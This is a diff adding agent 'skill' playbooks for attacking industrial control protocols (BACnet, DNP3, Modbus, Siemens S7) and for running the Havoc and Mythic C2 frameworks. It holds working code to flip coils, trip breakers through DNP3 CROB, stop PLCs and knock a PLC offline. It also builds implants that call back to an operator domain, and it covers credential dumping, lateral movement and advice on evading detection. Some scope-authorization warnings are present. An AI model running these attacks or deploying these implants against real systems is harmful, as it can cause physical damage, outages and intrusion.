+Writes to ICS/OT devices can move physical actuators — open valves, trip breakers, freeze pumps, override safety setpoints. **Confirm written scope authorization for any write/control class operation. Read-only enumeration is generally safe.** If unsure, default to read-only.
+
+## Protocol routing
+
+| Protocol | TCP/UDP Port | Sub-skill | Wire fingerprint |
+|---|---|---|---|
+| **Modbus TCP** | TCP 502 | `modbus` | MBAP header, function codes 1-127 |
+| **BACnet/IP** | UDP 47808 | `bacnet` | APDU PDU types 0-15, Who-Is/I-Am |
+| **Siemens S7Comm** | TCP 102 | `s7comm` | ISO-on-TCP (RFC 1006) + S7 protocol IDs |
+| **DNP3** | TCP 20000 | `dnp3` | Start bytes 0x05 0x64, link layer |
+| **EtherNet/IP + CIP** | TCP 44818, UDP 2222 | (use enumeration; CVE-driven exploits) | ENIP encapsulation header |
+| **PROFINET RT** | UDP 34962-34964 | (use enumeration) | EtherType 0x8892 (L2) |
+| **OPC UA** | TCP 4840 | (use enumeration) | OPC UA Binary protocol |
+
+## Quick fingerprint sweep
+
+```bash
+nmap -sV -p 102,502,20000,44818,4840 --script="*ics*,*scada*,modbus-discover,s7-info,dnp3-info,bacnet-info,enip-info" 10.0.0.0/24
+```
+
+## Useful tooling
+
+| Tool | Use |
+|---|---|
+| `pymodbus`, `mbtget` | Modbus client |
+| `bacpypes`, `bacnet-stack` | BACnet client |
+| `snap7`, `python-snap7` | S7Comm client |
+| `opendnp3`, `dnp3-toolkit` | DNP3 master |
+| `cip-py`, `pylogix` | EtherNet/IP / CIP (Allen-Bradley) |
+| `python-opcua` / `opcua-asyncio` | OPC UA |
+| `ISF` (Industrial Security Framework) | Mass enumeration + exploit framework |
+| `PLCinject` | Siemens S7 logic injection |
+
+## Defender baseline (useful for triage)
+
+ICS-CERT advisories (https://www.cisa.gov/uscert/ics/advisories), Dragos Threat Intel Briefs, Nozomi / Claroty / Tenable.ot for telemetry. Understanding what defenders see helps you stay below detection thresholds.

--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/bacnet/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/bacnet/SKILL.md
@@ -1,0 +1,114 @@
+---
+name: ics-bacnet
+description: "BACnet/IP attack — UDP/47808 discovery via Who-Is broadcast, ReadProperty / WriteProperty without auth, BBMD abuse for remote reach, vendor-specific I-Am responses, COV (Change Of Value) subscription flood, Building Automation HMI pivot."
+when_to_use: "bacnet bacnet-ip building automation hvac who-is i-am readproperty writeproperty bbmd cov 47808 4660 vendor"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ics-ot
+  tags: bacnet, building-automation, hvac, ics
+  mitre_attack: T0855, T0836
+---
+
+# BACnet/IP Attack — Building Automation
+
+BACnet runs HVAC, lighting, access control, elevators in commercial buildings. UDP/47808 by default. No authentication in BACnet/IP.
+
+## Discover
+
+```bash
+# Send Who-Is broadcast (BACnet's auto-discovery)
+nmap -sU -p 47808 --script=bacnet-info 10.0.0.0/24
+
+# Or with bacnet-tools (apt: bacnet-stack)
+bacwi                                  # who-is broadcast
+bacrp 1234 8 1 85                      # ReadProperty: device 1234, object analog-value 1, property 85 (present-value)
+
+# bacpypes (Python)
+python3 -c '
+from bacpypes.app import BIPSimpleApplication
+from bacpypes.core import run, stop
+from bacpypes.iocb import IOCB
+from bacpypes.local.device import LocalDeviceObject
+from bacpypes.apdu import WhoIsRequest
+ld = LocalDeviceObject(objectName="x", objectIdentifier=599, vendorIdentifier=15)
+app = BIPSimpleApplication(ld, "10.0.0.99")
+req = WhoIsRequest(); req.pduDestination = ("10.0.0.255",47808)
+iocb = IOCB(req); app.request_io(iocb)
+# Devices respond with I-Am
+'
+```
+
+## What you get from discovery
+
+Each I-Am response identifies:
+- Device Instance number (PK for that device)
+- Vendor ID (Honeywell=24, Siemens=7, Schneider=10, Johnson Controls=5, ...)
+- Max APDU + Segmentation support
+
+Look up the vendor — vendor-specific objects often expose more (admin override, factory reset, etc.).
+
+## Read everything
+
+```bash
+# Object types to enumerate: analog-input(0), analog-output(1), analog-value(2),
+# binary-input(3), binary-output(4), binary-value(5), device(8), schedule(17), program(16)
+
+# Read all objects on a device:
+bacrpm 1234 8 1 76    # property 76 = object-list
+
+# Each entry: (object-type, instance). Then for each:
+bacrp 1234 0 1 85     # analog-input 1, present-value
+```
+
+## Write attacks
+
+### Override an output (the actual physical effect)
+```bash
+# Force binary-output 5 ON with priority 8 (manual operator)
+bacwp 1234 4 5 85 8 -1 0   # write True at priority 8
+
+# AnalogOutput (e.g., setpoint) to 40°C
+bacwp 1234 1 3 85 8 -1 40.0
+```
+
+### Subscribe to COV — Change Of Value (passive observation w/ delivery to attacker)
+```bash
+bacscov 1234 0 1 60    # Subscribe to analog-input 1, 60-sec lifetime
+# Server pushes updates as values change — passive tap on building telemetry
+```
+
+### Broadcast Storm (BBMD abuse)
+BBMD (BACnet Broadcast Management Device) forwards broadcasts across IP subnets. A misconfigured BBMD lets you reach EVERY BACnet device in the org from a single network position:
+
+```bash
+# Send Who-Is with destination = BBMD's broadcast-distribution-table
+# Each device replies with I-Am directly to attacker — fingerprints the whole estate
+```
+
+### Vendor-specific overrides
+- Johnson Controls Metasys: `device.system-status` writable from network → restart device
+- Siemens Apogee: `program-state` writable → halt/run program objects
+- Honeywell Niagara: web UI on port 80/443 often unauth or default creds (`tridium/tridium`)
+
+## Pivot from BACnet to OT network
+
+A compromised BACnet controller often has secondary network interfaces:
+- Trunk to RS-485 sensor net (BACnet MS/TP)
+- Modbus to a chiller / VFD
+- LonWorks for older lighting controls
+- KNX for European installations
+
+Once you control the BACnet gateway, you can tunnel to those sub-protocols.
+
+## OPSEC + safety
+
+- **Building safety**: writes to HVAC setpoints affect physical occupants. Don't change setpoints by >2°C without sign-off; many buildings have safety-system interlocks but not all.
+- COV subscriptions are visible in BACnet IDS (Tridium, Wattics, Siemens Cybertect) but not in network IDS — quiet exfil channel for building telemetry.
+- Logs: BACnet has no audit by default. Some controllers log via Niagara web UI — check that side.
+
+## References
+
+- "BACnet/IP Vulnerabilities" — Stephen Hilt, Trend Micro
+- bacpypes docs — github.com/JoelBender/bacpypes
+- DEFCON 28 ICS Village "Building Automation Attacks" — Marc Rogers
+- ASHRAE 135 (the BACnet spec itself — reference what's writable per object type)

--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/dnp3/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/dnp3/SKILL.md
@@ -1,0 +1,118 @@
+---
+name: ics-dnp3
+description: "DNP3 attack — TCP/20000 (or 19999 serial-over-TCP) outstation enumeration, binary input / analog input poll, control relay output block (CROB) actuation, unsolicited reporting abuse, DNP3 Secure Authentication (DNP3-SA) downgrade, vendor-specific objects."
+when_to_use: "dnp3 distributed network protocol 20000 19999 outstation rtu master control relay crob analog binary unsolicited dnp3-sa"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ics-ot
+  tags: dnp3, rtu, scada, utility, power-grid
+  mitre_attack: T0855, T0836, T0855, T0846
+---
+
+# DNP3 Attack — Utility SCADA
+
+DNP3 is the dominant protocol in North American electric utilities (substations, RTUs) and water/wastewater. TCP/20000.
+
+## Discover
+
+```bash
+# nmap
+nmap -p 20000 --script=dnp3-info 10.0.0.0/24
+
+# Or pyOPENDNP3 / pydnp3 / dnp3-toolkit
+# Quick test:
+python3 -c '
+import socket, struct
+# DNP3 link layer Start (0x05 0x64), Length, Control, Dest, Src
+pkt = b"\x05\x64\x05\xc0\x00\x00\x01\x00\xa5\xa1"
+s = socket.socket(); s.connect(("10.0.0.50", 20000)); s.send(pkt)
+print(s.recv(256).hex())
+'
+```
+
+## Read attacks (passive — generally safe)
+
+```python
+# pydnp3 (or opendnp3 Python binding) — read class 0, 1, 2, 3 data
+import opendnp3
+# ... master init + asyncrun ...
+# Class 0 = static (current value of every point)
+# Class 1/2/3 = events (changes)
+master.ScanClasses([0, 1, 2, 3])
+# Output: a dump of every binary/analog/counter/control point's state.
+```
+
+## Control attacks (potentially HIGH IMPACT)
+
+### Control Relay Output Block (CROB) — trip / close a breaker
+```python
+# Group 12 Var 1 CROB — operation field controls action
+# trip = 0x81, close = 0x41, pulse on = 0x01
+import opendnp3
+crob = opendnp3.ControlRelayOutputBlock(opendnp3.ControlCode.LATCH_ON)
+res = master.SelectAndOperate(crob, 5)   # select+operate on index 5
+# Index 5 might be "circuit breaker 5 trip" — opens the breaker.
+```
+
+This is the single most dangerous DNP3 primitive: a successful Select+Operate on the right index can trip transmission breakers, open dam gates, shut off pumps.
+
+### Analog Output Block (AOB) — setpoint
+```python
+aob = opendnp3.AnalogOutputInt16(value=100)
+master.SelectAndOperate(aob, 3)
+# index 3 might be voltage setpoint, water level, etc.
+```
+
+## Unsolicited reporting abuse
+
+DNP3 supports outstation-initiated reports. An attacker positioned between master and outstation can:
+- Inject fake unsolicited reports (false alarms) — operator response cascade
+- Suppress real reports — operator blind during a real fault
+- Reply with stale data via timestamp tampering (Group 50 Var 1)
+
+## DNP3 Secure Authentication (DNP3-SA) downgrade
+
+DNP3-SA adds HMAC-based message authentication. Many implementations support both authenticated and unauthenticated modes for backward compatibility:
+
+```python
+# Send unauthenticated control with a "session key change" request
+# If outstation accepts ANY pre-shared key, the implementation is broken.
+# Check via opendnp3.SecureAuthentication examples.
+```
+
+Many older RTUs don't support DNP3-SA at all — full unauthenticated control plane.
+
+## Tooling
+
+```bash
+# dnp3-toolkit (pen-test focused)
+pip install dnp3-toolkit
+dnp3-scan 10.0.0.0/24
+dnp3-info 10.0.0.50
+
+# Free Modbus / DNP3 simulator (for testing PoCs offline before live engagement)
+opendnp3 examples — github.com/dnp3/opendnp3
+```
+
+## OPSEC + safety
+
+- **Critical safety**: DNP3 controls the bulk electric power system (in North America). Trip operations cause real outages. SelectAndOperate on a transmission breaker can blackout neighborhoods. **Require written scope authorization for any control-class action.**
+- ICS-CERT and EISAC actively monitor for unusual DNP3 traffic. Master-station IP changes are detected.
+- DNP3 over modem (serial) is common in older substations — your network position must be at the SCADA master, not internet.
+
+## Reference indices for common deployments
+
+| Vendor RTU | Common control indices |
+|---|---|
+| GE D20 | Breaker trip = 0-9, recloser = 10-19 |
+| SEL-2440 | Per-feeder breaker = 16-23 |
+| Schweitzer RTAC | Indices vary heavily by configuration |
+
+Always confirm point map (POINT.CSV or DNP3 device profile) before any write.
+
+## References
+
+- IEEE 1815 (DNP3 standard) and "DNP3 Application Layer" specification
+- "Hacking the Electric Grid" — Daniel Crowley (Trustwave / X-Force Red)
+- DEFCON 27 ICS Village "DNP3 Authentication Bypass"
+- NERC CIP-007/CIP-005 (defender baseline — useful to understand what's audited)

--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/modbus/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/modbus/SKILL.md
@@ -1,0 +1,116 @@
+---
+name: ics-modbus
+description: "Modbus TCP attack — port 502 enumeration, coil/holding-register read/write without auth, function-code abuse (FC8 diagnostic, FC43 read-device-id), Modbus-over-Serial via TCP gateway, write-with-no-confirm DoS, value tampering against PLCs."
+when_to_use: "modbus modbus-tcp tcp 502 plc scada coil register holding input function code fc fc8 fc43 mei serial gateway moxa"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ics-ot
+  tags: modbus, plc, scada, ics, ot
+  mitre_attack: T0855, T0836, T0831
+---
+
+# Modbus TCP Attack
+
+Modbus has no authentication and no transport encryption. Port 502 → full PLC control if reachable.
+
+## Discover
+
+```bash
+# Scan for port 502
+nmap -p 502 --open -sV --script=modbus-discover.nse 10.0.0.0/24
+
+# Or with Shodan / Censys: port:502 country:XX
+# Internet-facing Modbus is still depressingly common (search "modbus" on Shodan)
+```
+
+## Read everything
+
+```bash
+# Python pymodbus
+python3 -c '
+from pymodbus.client import ModbusTcpClient
+c = ModbusTcpClient("10.0.0.5", port=502)
+c.connect()
+print("Coils 0-100:",   c.read_coils(0, 100).bits)
+print("Discrete 0-100:", c.read_discrete_inputs(0, 100).bits)
+print("Hold regs:",      c.read_holding_registers(0, 100).registers)
+print("Input regs:",     c.read_input_registers(0, 100).registers)
+c.close()
+'
+
+# Or with mbtget (CLI)
+mbtget -r1 -a 0 -n 100 10.0.0.5  # read coils
+mbtget -r3 -a 0 -n 100 10.0.0.5  # read holding regs
+
+# nmap script enum
+nmap -p 502 --script=modbus-discover --script-args='modbus-discover.aggressive=true' 10.0.0.5
+```
+
+## Identify the device (FC43 / MEI)
+
+```bash
+# Function code 43 (Read Device Identification) returns vendor / model / firmware
+python3 -c '
+from pymodbus.client import ModbusTcpClient
+from pymodbus.mei_message import ReadDeviceInformationRequest
+c = ModbusTcpClient("10.0.0.5", port=502)
+c.connect()
+r = c.execute(ReadDeviceInformationRequest(read_code=1))
+print(r.information)
+c.close()
+'
+# Output: {0: "Schneider Electric", 1: "BMX-P34-2020", 2: "v3.20", ...}
+```
+
+## Write attacks
+
+### Single coil flip (DO output)
+```python
+c.write_coil(address=10, value=True)   # flip coil 10 ON
+# In a PLC, coil 10 might be: motor start, valve open, breaker close
+```
+
+### Tamper holding registers (process setpoints)
+```python
+c.write_register(address=100, value=9999)   # often a setpoint or limit
+```
+
+### Flood diagnostic FC8 sub-function 4 ("Force Listen Only Mode")
+```python
+# Stops the PLC from responding to ANY Modbus request — soft DoS
+# Use raw socket:
+import socket, struct
+s = socket.socket()
+s.connect(("10.0.0.5", 502))
+mbap = struct.pack(">HHHB", 1, 0, 6, 1)
+pdu  = struct.pack(">BHH", 8, 0x0004, 0x0000)
+s.send(mbap + pdu)
+```
+
+### Bulk-write registers (often unauthenticated)
+```python
+c.write_registers(address=0, values=[0]*100)   # zero-out 100 registers
+```
+
+## Common findings
+
+| Finding | Impact |
+|---|---|
+| Modbus on internet | Full process control of whatever the PLC drives |
+| No firewall between IT and OT VLAN | Lateral move from compromised desktop to PLC |
+| Modbus over serial via TCP gateway (Moxa, Lantronix) | Same primitives over WAN |
+| HMI uses default Modbus polling | Coil writes survive HMI refresh — persistent tamper |
+| Unit ID 0 broadcast | Single packet reaches every slave (no response, but write succeeds) |
+
+## OPSEC + safety
+
+- **Real-world warning**: writing to a coil/register on a live PLC may move a physical actuator. Confirm scope authorization for write-class testing IN WRITING before any FC5/6/15/16. Read-only is generally safe; writes can hurt people.
+- Modbus has no audit log. Defenders use IDS (Nozomi, Claroty, Dragos) — `modbus_function_5` and `modbus_function_15` are distinctive in their telemetry.
+- Many PLCs lack rate limiting — connection floods can OOM the network stack and freeze the device for the duration of the attack.
+
+## References
+
+- "Modbus Hacking" — Joel Langill (recurring S4 Conference talks)
+- pymodbus docs — github.com/pymodbus-dev/pymodbus
+- nmap NSE modbus-discover.nse
+- IEC 62443 (defender baseline; useful for understanding what's in-scope)

--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/s7comm/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/s7comm/SKILL.md
@@ -1,0 +1,119 @@
+---
+name: ics-s7comm
+description: "Siemens S7 PLC attack — TCP/102 ISO-TP+S7-COMM, snap7 / python-snap7 enumeration, DB/M/E/A area read+write, PLC stop/start/run, password bypass (S7-300/400 vs S7-1200/1500 differences), CVE chain (e.g., Stuxnet's legacy primitives, CVE-2019-10936)."
+when_to_use: "siemens s7 s7comm s7-300 s7-400 s7-1200 s7-1500 plc tia portal iso-tp tsap 102 snap7 step7"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: ics-ot
+  tags: siemens, s7, plc, ics, ot
+  mitre_attack: T0855, T0836, T0816
+---
+
+# Siemens S7 PLC Attack
+
+S7Comm runs over ISO-on-TCP (RFC 1006), TCP/102. Siemens PLCs (S7-300, S7-400, S7-1200, S7-1500) speak it.
+
+## Discover
+
+```bash
+nmap -p 102 --script=s7-info 10.0.0.0/24
+# s7-info NSE returns Module Type, Order Code, Firmware, PLC name
+
+# Or with snap7
+python3 -c '
+import snap7
+c = snap7.client.Client()
+c.connect("10.0.0.50", 0, 1)        # IP, rack, slot
+print(c.get_cpu_info())
+print(c.get_cp_info())
+print(c.get_order_code())
+'
+```
+
+## Read / Write data blocks
+
+S7 memory areas: DB (data block), M (memory bits), E (input), A (output), T (timer), C (counter).
+
+```python
+import snap7
+from snap7 import util
+
+c = snap7.client.Client()
+c.connect("10.0.0.50", 0, 1)
+
+# Read 100 bytes from DB10
+data = c.db_read(10, 0, 100)
+# Decode:
+print("DB10.DBX0.0 (bit):", util.get_bool(data, 0, 0))
+print("DB10.DBW2 (int):",   util.get_int(data, 2))
+print("DB10.DBD4 (real):",  util.get_real(data, 4))
+
+# Write back
+util.set_real(data, 4, 99.9)
+c.db_write(10, 0, data)
+```
+
+## Stop / Start the PLC
+
+```python
+c.plc_stop()          # ⚠ halts execution of the user program — process stops
+c.plc_hot_start()     # Resume
+c.plc_cold_start()    # Restart with full init
+# Each is unauthenticated on S7-300/400 by default.
+```
+
+## Authentication / "Protection Level" differences
+
+| PLC family | Default protection | Bypass class |
+|---|---|---|
+| S7-300/400 | Often none ("No Protection") | Direct |
+| S7-1200 (FW < V4) | None or password (cleartext on wire) | Sniff password |
+| S7-1200 (FW V4+) | Password + challenge-response | Replay session, weak hash |
+| S7-1500 | Password + challenge | CVE-2019-10936 (info leak), then offline crack |
+
+```python
+# S7-1200/1500 password auth via snap7's set_session_password
+c.set_session_password("changeme")
+# Common defaults: "0000000", "siemens", "100", blank, vendor name
+```
+
+## Stuxnet-class primitives (S7-300/400 still in many old fleets)
+
+- **Function block tampering**: write a custom FB that replaces an existing one — process logic silently changes.
+- **OB1 hook**: prepend a payload block to OB1 (the cyclic program block). Runs every scan cycle.
+- **PROFIBUS frame injection** (requires hardware): forge sensor data so the PLC sees normal values while actuators are mis-driven.
+
+```python
+# Write a DB byte that's a control flag in the PLC program
+c.write_area(0x84, 1, 0, bytearray([0xFF]))   # write to DB1 byte 0
+```
+
+## CVE-2019-10936 — info leak on S7-1200/1500
+
+Send a crafted COTP packet → PLC returns memory regions (uncovered password hash on some firmwares):
+
+```bash
+# PoC: github.com/Nibblesec/s7-info-leak
+python3 leak.py 10.0.0.50
+```
+
+## TIA Portal interaction
+
+If you have network access to TIA Portal (the engineering workstation) instead of just the PLC, you can:
+- Steal the project file (`.ap16`) — contains every PLC's logic, comments, possibly password hashes
+- Replace the project being deployed to inject persistent logic changes
+- Default TIA Portal SQL — port 1433 with default sa / no password on older installs
+
+## OPSEC + safety
+
+- **Physical safety**: `plc_stop()` halts whatever the PLC controls. Pumps stop, valves freeze in last state, motors coast. Confirm scope authorization for stop-class testing.
+- Read-only enumeration is generally safe and silent. S7 has no audit log.
+- IT-OT IDS (Claroty, Nozomi, Dragos) flags new S7Comm sources — first connection from your IP is loud.
+- Siemens TIA Portal logs every project upload/download. Tampering with logic is detectable post-engagement during the next checksum review.
+
+## References
+
+- snap7 docs — snap7.sourceforge.net
+- "The S7Comm protocol" — Wireshark dissector docs
+- ICS-CERT advisories on Siemens products (https://www.cisa.gov/uscert/ics/advisories)
+- "Stuxnet Deep Dive" — Ralph Langner (still the canonical reference)

--- a/packages/decepticon/decepticon/skills/standard/post-exploit/c2/havoc/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/post-exploit/c2/havoc/SKILL.md
@@ -1,0 +1,156 @@
+---
+name: c2-havoc
+description: "Havoc C2 framework (C5pider/Havoc) — modern Sliver/CS alternative, Demon agent with indirect syscalls, sleep obfuscation (Ekko/Zilean/FOLIAGE), Donut PIC loader integration, profile-driven HTTP comms, MaterialUI web client. Best when you need modern OPSEC without Cobalt Strike cost."
+when_to_use: "havoc demon c5pider sleep obfuscation ekko ekko zilean foliage indirect syscall donut pic"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: c2
+  tags: c2, havoc, demon, post-exploitation, opsec
+  mitre_attack: T1071, T1105, T1620
+---
+
+# Havoc C2 Operator Skill
+
+Havoc (C5pider) is an open-source, modern C2 framework released 2023. The Demon agent ships with hardened OPSEC defaults (indirect syscalls, sleep obfuscation, no static strings) that make it harder to detect than older OSS frameworks.
+
+## Setup
+
+```bash
+# Build from source (Linux)
+git clone https://github.com/HavocFramework/Havoc
+cd Havoc
+make ts-build
+make client-build
+make server-build
+
+# Or run via Docker
+docker compose up -d
+```
+
+## Architecture
+
+```
+   ┌────────────┐       ┌─────────────┐       ┌──────────┐
+   │ Operator   │ <───> │ Teamserver  │ <───> │ Demon    │
+   │ (Client)   │  TS   │ (Go + gRPC) │  HTTP │ (Implant)│
+   └────────────┘       └─────────────┘       └──────────┘
+```
+
+- **Teamserver**: Listens on operator port (40056 default) for clients; HTTP listener for demons.
+- **Client**: Qt-based desktop UI (Material Dark).
+- **Demon**: Windows x86_64/x86 implant in C with embedded sleep obfuscation + indirect syscalls.
+
+## Configure a profile
+
+Havoc uses a `profiles.yaotl` HCL-like config. Example for a low-OPSEC HTTP listener:
+
+```hcl
+Teamserver {
+  Host = "0.0.0.0"
+  Port = 40056
+  Build {
+    Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
+    Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
+    Nasm = "/usr/bin/nasm"
+  }
+}
+
+Operators {
+  user "op-alice" { Password = "strongpassword" }
+}
+
+Listeners {
+  Http {
+    Name      = "primary-http"
+    Hosts     = ["op-server.com"]
+    HostBind  = "0.0.0.0"
+    PortBind  = 443
+    PortConn  = 443
+    Secure    = true
+    HostRotation = "round-robin"
+    Uris      = ["/jquery-3.3.1.min.js", "/jquery-3.3.2.min.js"]   # blend with CDN traffic
+    Headers   = ["X-Forwarded-For: 1.2.3.4"]
+    UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
+  }
+}
+```
+
+Then `./havoc server --profile profiles.yaotl -v`.
+
+## Build a Demon
+
+In the client UI:
+1. Attack → Payload → Demon
+2. Listener: select your HTTP listener
+3. Arch: x64 / x86
+4. Format: Windows Exe / Windows DLL / Shellcode
+5. Sleep Technique: **Ekko** (queue user APC ROP chain) / **Zilean** (timer-based) / **FOLIAGE** (ROP-based)
+6. Indirect Syscalls: **Enable** (resolves syscalls at runtime, bypasses static SSN hooks)
+7. Save → drop on target
+
+```bash
+# CLI build (haven't found stable CLI build API as of 2024; use the Qt client for now)
+```
+
+## What makes Havoc's OPSEC strong
+
+### Sleep obfuscation (3 options)
+- **Ekko**: queues a user APC that ROPs through SystemFunction032/033 to RC4-encrypt the .text section, then sleeps, then decrypts.
+- **Zilean**: timer-based variant.
+- **FOLIAGE**: pure ROP chain, no Win32 timer dependency.
+
+Result: while Demon sleeps, its code in memory is encrypted → memory scanners (Defender, Elastic, MDE) can't sig-match.
+
+### Indirect syscalls
+Most EDRs hook `NtAllocateVirtualMemory` etc. in ntdll. Direct-syscall implants (older Cobalt Strike) bypass this but get detected by syscall-from-non-ntdll heuristics.
+
+Havoc's indirect syscalls: resolve the syscall stub address at runtime, jump TO that address (so the syscall appears to come from ntdll), then return.
+
+### No static strings
+All strings (Win32 API names, C2 URI paths, command names) are hashed and resolved at runtime via DJB2/FNV1A. `strings demon.exe | grep -i shell` returns nothing.
+
+### Module stomping
+Demon module can be hidden by overwriting an existing legitimate module (`mscorlib.dll`, `clr.dll`).
+
+## Common commands
+
+```
+> shell whoami /all
+> proc list
+> proc kill <pid>
+> token impersonate <pid>
+> dotnet inline-execute <SharpHound.exe> -c All
+> mimi !sekurlsa::logonpasswords          # built-in Mimikatz wrap
+> spawnas <user> <pass> <listener>         # spawn new demon as different user
+> jump <psexec64|wmi|smb_lateral> <host>   # lateral movement
+```
+
+## Comparison: Havoc vs Sliver vs Mythic vs Cobalt Strike
+
+| | Havoc | Sliver | Mythic | Cobalt Strike |
+|---|---|---|---|---|
+| **Sleep obfuscation** | Built-in (Ekko/Zilean/FOLIAGE) | None — needs BOF | Per-agent | Built-in (Sleep Mask) |
+| **Indirect syscalls** | Yes, opt-in | No (only direct) | Per-agent | Yes (via patches) |
+| **OPSEC defaults** | Strong | Fair | Per-agent | Excellent |
+| **Modern UI** | Yes (Qt MaterialUI) | Web + CLI | Web | Heavy Java |
+| **Cross-platform implant** | Windows only (Demon) | Yes (Sliver) | Per-agent (Poseidon=macOS/Linux) | Yes (Beacon) |
+| **License** | GPL OSS | GPL OSS | BSD OSS | Commercial $ |
+
+## When to pick Havoc
+
+- Windows-only engagement, need modern OPSEC out-of-the-box
+- Cobalt Strike's price/license unavailable
+- Operator team comfortable with Qt UI vs web
+- Need indirect syscalls + sleep obfuscation without writing BOFs
+
+When NOT to pick:
+- Need cross-platform implant (Sliver/Mythic Poseidon better)
+- Need a polished commercial UI for client-deliverable screenshots (CS still wins)
+- Need mature OPSEC profile library (CS Malleable profile ecosystem is bigger)
+
+## References
+
+- Havoc Framework docs — havocframework.com
+- C5pider's blog — c5pider.com (Ekko, Zilean writeups)
+- "Modern C2 OPSEC" — Outflank training material
+- Cobalt Strike Malleable profile guide (translates well to Havoc HTTP profile design)

--- a/packages/decepticon/decepticon/skills/standard/post-exploit/c2/mythic/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/post-exploit/c2/mythic/SKILL.md
@@ -1,0 +1,144 @@
+---
+name: c2-mythic
+description: "Mythic C2 framework operations — multi-agent (Apfell, Apollo, Athena, Poseidon, Medusa), web UI on 7443, RabbitMQ + PostgreSQL backend, JSON-RPC tasking model, building an agent via mythic-cli, profile design (HTTP/SMB/named pipe/peer-to-peer), opsec defaults. Comparison to Sliver: more pluggable, less polished UI."
+when_to_use: "mythic c2 apollo apfell poseidon athena medusa command and control agent payload tasking opsec mythic-cli"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: c2
+  tags: c2, mythic, post-exploitation
+  mitre_attack: T1071, T1105, T1057
+---
+
+# Mythic C2 Operator Skill
+
+Mythic (cody-thomas/Mythic) is a containerized, multi-agent C2 framework. Strengths: pluggable agents (~10+ official), good for cross-platform engagements, JSON-RPC tasking model is scriptable.
+
+## Setup (one-time, on the operator server)
+
+```bash
+# Clone + install
+git clone https://github.com/its-a-feature/Mythic
+cd Mythic
+sudo ./install_docker_ubuntu.sh        # or install_docker_kali, install_docker_macos
+sudo ./mythic-cli start
+# Web UI: https://<host>:7443
+# Default creds: mythic_admin / printed during install
+
+# Install agents (each is a separate container)
+sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo     # Windows .NET agent
+sudo ./mythic-cli install github https://github.com/MythicAgents/Poseidon   # macOS/Linux Go agent
+sudo ./mythic-cli install github https://github.com/MythicAgents/Medusa     # cross-platform Python
+sudo ./mythic-cli install github https://github.com/MythicAgents/Athena     # cross-platform .NET 6
+```
+
+## Agent matrix
+
+| Agent | Platform | Lang | Best for |
+|---|---|---|---|
+| **Apollo** | Windows | C# / .NET Framework 3.5+ | Windows-heavy engagements, .NET interop |
+| **Poseidon** | macOS, Linux | Go | Cross-platform, single static binary |
+| **Athena** | Windows / macOS / Linux | .NET 6/7/8 | Modern .NET, AOT-compiled |
+| **Apfell** | macOS | JavaScript for Automation (JXA) | Native macOS execution via osascript |
+| **Medusa** | any | Python | Quick prototypes, fileless |
+| **Service Wrapper** | Windows | C++ | Persistence via Windows service |
+
+## Profile matrix
+
+Profiles = the comms channel. An agent can use one or more profiles.
+
+| Profile | Transport | Detection |
+|---|---|---|
+| **http** | Plain HTTP(S) with configurable headers, paths, jitter, sleep | Easiest to fingerprint; use behind redirector + domain fronting |
+| **websocket** | WS / WSS | Long-lived; suspicious from desktop |
+| **smb** | Named pipe over SMB | Peer-to-peer between Apollo agents — no internet needed for inner workstations |
+| **dns** | DNS TXT / A queries to attacker NS | Slow, but bypasses every HTTP-only firewall |
+| **peer-to-peer (SMB)** | One agent forwards another's traffic | Use for deep network — only one egress point needed |
+
+```bash
+# Install a profile
+sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http
+sudo ./mythic-cli install github https://github.com/MythicC2Profiles/websocket
+sudo ./mythic-cli install github https://github.com/MythicC2Profiles/dns
+```
+
+## Build a payload (Apollo + http profile)
+
+```bash
+# CLI build (faster than web UI for repeatable ops)
+sudo ./mythic-cli payload create \
+  --name "stage1" \
+  --description "Apollo http to op-server.com" \
+  --agent Apollo \
+  --c2_profile http \
+  --c2_profile_parameter callback_host=https://op-server.com \
+  --c2_profile_parameter callback_port=443 \
+  --c2_profile_parameter encrypted_exchange_check=T \
+  --c2_profile_parameter callback_interval=30 \
+  --c2_profile_parameter callback_jitter=20 \
+  --c2_profile_parameter killdate=2025-12-31 \
+  --build_parameter version=net4.0 \
+  --output_file stage1.exe
+
+# Drop stage1.exe on the target — it calls back to op-server.com over HTTPS
+```
+
+## Tasking from the operator
+
+Mythic provides:
+- Web UI (callback view → click + task)
+- `mythic-cli scripting` (Python wrapper)
+- Direct GraphQL API at `https://<host>:7443/v1/graphql`
+
+```bash
+# Scripting example — list all callbacks, task each
+python3 -c '
+from mythic import mythic, mythic_classes, mythic_utilities, mythic_callbacks
+import asyncio
+async def main():
+    m = await mythic.login(server_ip="op-server.com", username="op", password="pw")
+    cbs = await mythic_callbacks.get_all_active_callbacks(mythic=m)
+    for cb in cbs:
+        await mythic_callbacks.issue_task(mythic=m, command_name="shell", parameters="whoami", callback_display_id=cb.display_id)
+asyncio.run(main())
+'
+```
+
+## OPSEC defaults
+
+- **Profile encryption**: HTTP profile uses encrypted_exchange_check by default — key derived via Diffie-Hellman after the initial connect. Don't disable.
+- **Sleep / jitter**: default 30s/20% is loud. Production engagements: 5-minute sleeps, 25% jitter, weekly killdate.
+- **Callback host**: NEVER call back to a bare attacker IP. Use a domain on a CDN (CloudFront, Cloudflare), preferably with domain fronting.
